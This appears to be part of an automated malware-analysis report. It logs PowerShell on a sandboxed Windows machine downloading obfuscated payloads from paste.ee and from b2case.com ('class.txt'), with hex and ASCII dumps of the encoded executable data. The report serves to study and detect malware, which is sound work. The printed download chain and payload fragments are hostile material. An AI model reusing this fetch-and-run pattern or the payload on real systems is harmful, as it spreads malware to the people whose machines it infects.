                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 37 30 30 30 0d 0a 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 33 38 52 42 68 64 e2 86 93 3a e2 86 93 68 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 58 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 45 77 63 58 4b 39 4d 57 45 77 67 59 4b 38 30 72 61 78 45 48 45 51 69 61 62 78 67 e2 86 93 3a e2
                                                                                                Data Ascii: 7000::I::::U::::Gg:::Cs::::x::::K38RBhd:hQ:::CgX:::KEwcXK9MWEwgYK80raxEHEQiabxg:
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 86 93 43 69 59 63 4f 4f 66 39 2f 2f 38 47 4b 42 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 74 4e 58 4c 38 42 51 42 77 48 53 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 42 6e 49 69 42 67 42 77 48 43 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 42 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 64 4f 4c 54 39 2f 2f 38 67 36 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 42 68 73 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 49 6d 42 67 42 77 48 69 67 4c e2 86 93
                                                                                                Data Ascii: CiYcOOf9//8GKBw:::otNXL8BQBwHSgL:::GBnIiBgBwHCgL:::GKBM:::oWFhUoDQ::CiYdOLT9//8g6:M::CgE:::KBhsoB:::BnImBgBwHigL
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 93 43 69 67 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 43 75 66 49 49 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 6b 72 6b 69 67 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 69 75 4b 33 67 42 2b e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 30 66 43 6a 68 52 2f 50 2f 2f 66 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 42 42 38 4c 4f 45 50 38 2f 2f 39 7a 49 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 4d 46 45 51 55 6c 4b 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 76 4a 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: CigM:::KGCufIIgT:::oB:::ChkrkigP:::KGiuK3gB+:Q::Cg0fCjhR/P//fgE:::oTBB8LOEP8//9zIw::ChMFEQUlKCQ:::pvJQ::


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449734188.114.96.34431928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:13 UTC43OUTGET /d/d80GV/0 HTTP/1.1
                                                                                                Host: paste.ee
                                                                                                2024-10-22 04:17:13 UTC1230INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:13 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtQA7R2xv0jWZEy1V9SIKto354JpdaKXLbwUsNDDy2P4%2BQ7gYCfnT1GC6n8H44LHnAMBagtiTZQvFm%2FHqgA1cWz1POl3AB9aEA3pbKcStICUjTHwFCAPDApDew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad2b4dd3eae9-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-10-22 04:17:13 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 34 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 30 37 33 30 31 33 26 63 77 6e 64 3d 32 34 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 36 64 65 64 33 33 66 66 66 61 35 31 31 63 62 26 74 73 3d 32 39 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1449&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2073013&cwnd=242&unsent_bytes=0&cid=36ded33fffa511cb&ts=297&x=0"
                                                                                                2024-10-22 04:17:13 UTC1318INData Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 59 49 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                                                                Data Ascii: ::::M:YIU::B:::B::::::E:::E::::::::B:::::::::
                                                                                                2024-10-22 04:17:13 UTC1287INData Raw: 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 30 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                                                                Data Ascii: :g::::0g::::I::::::::::::::::::C:::G:ucnNyYw:::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 37 66 66 61 0d 0a 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                                                                Data Ascii: 7ffa::::::::::::::::::::::::::::::::::::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 42 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 6c 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 43 e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 49 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: :BQ:::GE::::V::::Jg:::HU::::4lw:::Be::Q::BC:D::::OIw::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 67 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2
                                                                                                Data Ascii: ::MwC::M:::::::::Dg::::::CgC:::GKgMwC::M:::::::::Dg:
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 44 67 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6a 6a 45 2f 2f 2f 2f 4f 75 66 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 7a 76 2f 2f 2f 7a 6a 58 2f 2f 2f 2f 4f 4b 44 2f 2f 2f 38 34 32 2f 2f 2f 2f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                                                                Data Ascii: :Dgg::::KjjE////Ouf///8mI::::::4zv///zjX////OKD///842////w::::MwC::M:::::::::Dg:::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 66 67 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 55 2f 67 45 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 34 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 4b 67 e2 86 93 3a
                                                                                                Data Ascii: :::Dg:::::fgQ:::QU/gEq:::DM:g:Cw:::::::::4:::::H4E:::EKg:
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: e2 86 93 3a e2 86 93 48 36 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 65 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 34 55 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 44 6e 2f 2f 2f 38 34 74 66 2f 2f 2f 7a 67 7a 2f 2f 2f 2f 4f 53 37 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 65 50 2f 2f 2f 7a 67 65 2f 2f 2f 2f 4f 68 6e 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 68 76 2f 2f 2f 7a 67
                                                                                                Data Ascii: :H6x:::Ee0s:::Q4Uw:::Dhe::::ODn///84tf///zgz////OS7///8mI::::::4eP///zge////Ohn///8mI::::::4hv///zg


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449735188.114.96.34431928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:15 UTC69OUTGET /class.txt HTTP/1.1
                                                                                                Host: b2case.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:16 UTC839INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:16 GMT
                                                                                                Content-Type: text/plain
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Last-Modified: Tue, 22 Oct 2024 03:17:47 GMT
                                                                                                ETag: W/"a1000-6250836a4ccc0-gzip"
                                                                                                Vary: Accept-Encoding
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EE7bzH349YYPR2ryJ1t5D12rXKt1bDswXyRO8hrRRXXP0RTEFuuh7dLZeAReseNI6ipgFpSiWsyaegFuZxAchGlEGyyssujiSBgRABh5ItiZOhHLt8%2FQ4bT4mLq9"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad39a9c46b11-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=683&delivery_rate=2364081&cwnd=225&unsent_bytes=0&cid=75d2527444612c1c&ts=421&x=0"
                                                                                                2024-10-22 04:17:16 UTC530INData Raw: 34 34 33 30 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78
                                                                                                Data Ascii: 4430AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdx
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 6f 5a 44 57 32 51 6c 4e 34 59 44 4e 32 77 68 4e 59 59 44 45 31 51 66 4e 77 58 44 36 31 41 5a 4e 45 57 44 5a 31 67 56 4e 51 56 44 50 31 51 54 4e 77 55 44 4c 31 51 53 4e 63 55 44 46 31 41 41 4e 34 54 44 39 30 41 50 4e 6f 54 44 34 30 67 4e 4e 45 54 44 76 30 67 4b 4e 67 53 44 6e 30 67 4a 4e 51 53 44 69 30 41 49 4e 73 52 44 5a 30 41 47 4e 59 52 44 55 30 67 45 4e 45 52 44 4b 30 51 43 4e 4d 4d 44 2f 7a 67 38 4d 41 50 44 74 7a 51 36 4d 77 4e 44 61 7a 77 31 4d 4d 4e 44 47 7a 41 78 4d 45 49 44 39 79 41 73 4d 34 4b 44 72 79 77 70 4d 6f 4a 44 59 79 51 6c 4d 45 4a 44 45 79 67 51 4d 38 48 44 37 78 67 62 4d 77 47 44 70 78 51 5a 4d 67 46 44 57 78 77 55 4d 38 45 44 43 78 41 41 4d 30 44 44 37 77 51 4f 4d 77 43 44 71 77 77 4a 4d 55 43 44 6a 77 67 46 4d 51 42 44 52 77 77 44
                                                                                                Data Ascii: oZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwD
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 39 44 63 2f 67 32 50 67 39 44 57 2f 41 31 50 49 39 44 51 2f 67 7a 50 77 38 44 4b 2f 41 79 50 59 38 44 45 2f 67 77 50 41 34 44 2b 2b 41 76 50 6f 37 44 34 2b 67 74 50 51 37 44 79 2b 41 73 50 34 36 44 73 2b 67 71 50 67 36 44 6d 2b 41 70 50 49 36 44 67 2b 67 6e 50 77 35 44 61 2b 41 6d 50 59 35 44 55 2b 67 6b 50 41 35 44 4f 2b 41 6a 50 6f 34 44 49 2b 67 68 50 51 34 44 43 2b 41 51 50 34 33 44 38 39 67 65 50 67 33 44 32 39 41 64 50 49 33 44 77 39 67 62 50 77 32 44 71 39 41 61 50 59 32 44 6b 39 67 59 50 41 32 44 65 39 41 58 50 6f 31 44 59 39 67 56 50 51 31 44 53 39 41 55 50 34 30 44 4d 39 67 53 50 67 30 44 47 39 41 52 50 49 30 44 41 38 67 50 50 77 7a 44 36 38 41 4f 50 59 7a 44 30 38 67 4d 50 41 7a 44 75 38 41 4c 50 6f 79 44 6f 38 67 4a 50 51 79 44 69 38 41 49 50
                                                                                                Data Ascii: 9Dc/g2Pg9DW/A1PI9DQ/gzPw8DK/AyPY8DE/gwPA4D++AvPo7D4+gtPQ7Dy+AsP46Ds+gqPg6Dm+ApPI6Dg+gnPw5Da+AmPY5DU+gkPA5DO+AjPo4DI+ghPQ4DC+AQP43D89gePg3D29AdPI3Dw9gbPw2Dq9AaPY2Dk9gYPA2De9AXPo1DY9gVPQ1DS9AUP40DM9gSPg0DG9ARPI0DA8gPPwzD68AOPYzD08gMPAzDu8ALPoyDo8gJPQyDi8AIP
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 44 36 37 51 2b 4f 67 76 44 33 37 67 39 4f 55 76 44 30 37 77 38 4f 41 76 44 76 37 67 37 4f 30 75 44 73 37 77 36 4f 6f 75 44 70 37 41 36 4f 63 75 44 6d 37 51 35 4f 51 75 44 6a 37 67 34 4f 45 75 44 67 37 77 33 4f 34 74 44 64 37 41 33 4f 73 74 44 61 37 51 32 4f 67 74 44 58 37 67 31 4f 55 74 44 55 37 77 30 4f 49 74 44 52 37 41 30 4f 38 73 44 4f 37 51 7a 4f 77 73 44 4c 37 67 79 4f 6b 73 44 49 37 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44 4e 30 51 44 4d 30 77 43 4e 6f 51 44 4a 30 41 43 4e 63 51 44 46 30 41 42 4e 4d 51 44 43 30 51 41 4e 41 4d 44 2f 7a 67 2f 4d 77
                                                                                                Data Ascii: D67Q+OgvD37g9OUvD07w8OAvDv7g7O0uDs7w6OouDp7A6OcuDm7Q5OQuDj7g4OEuDg7w3O4tDd7A3OstDa7Q2OgtDX7g1OUtDU7w0OItDR7A0O8sDO7QzOwsDL7gyOksDI7wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/Mw
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44 72 37 51 36 4f 63 75 44 6c 37 77 34 4f 45 75 44 66 37 51 33 4f 73 74 44 5a 37 77 31 4f 55 74 44 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44 31 36 77 73 4f 45 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d
                                                                                                Data Ascii: n8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkm
